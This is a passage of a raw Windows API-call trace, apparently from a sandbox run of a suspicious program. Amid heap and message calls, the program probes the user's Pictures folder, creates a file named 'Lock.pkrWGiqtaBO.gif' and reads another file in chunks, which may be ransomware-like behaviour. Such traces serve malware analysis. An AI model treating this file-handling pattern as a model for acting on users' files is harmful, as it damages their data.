[0211.139] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0211.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0211.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.139] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0211.139] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0211.139] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0211.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0211.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0211.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a73ea8 [0211.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.140] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0211.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ea8 | out: hHeap=0x2af0000) returned 1 [0211.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0211.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0211.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0211.141] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.pkrWGiqtaBO.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.pkrwgiqtabo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0211.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0211.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.142] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0211.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0211.142] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0211.142] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0211.142] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0211.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0211.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0211.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0211.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0211.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ef020 [0211.146] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0211.147] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0211.149] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x8b56, lpOverlapped=0x0) returned 1 [0211.150] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0211.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18b56) returned 0x2aae878 [0211.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ef020 | out: hHeap=0x2af0000) returned 1 [0211.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18b56) returned 0x37c0048 [0211.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0211.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.158] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0211.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0211.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0211.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18b56) returned 0x2aae878 [0211.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0211.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.159] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0211.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0211.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0211.159] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0211.159] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0211.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0211.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18b56) returned 0x2aae878 [0211.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0211.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0211.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b28 [0211.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0211.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0211.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa618 [0211.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0211.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0211.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0211.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18b56) returned 0x37d8ba8 [0211.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0211.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0211.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0211.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0211.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0211.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0211.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0211.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0211.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0211.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0211.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0211.163] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0211.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0211.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0211.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0211.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0211.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0211.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0211.163] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0211.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0211.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0211.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0211.163] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0211.163] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0211.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0211.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0211.164] HeapFree (in: hHeap=0x2af0000, 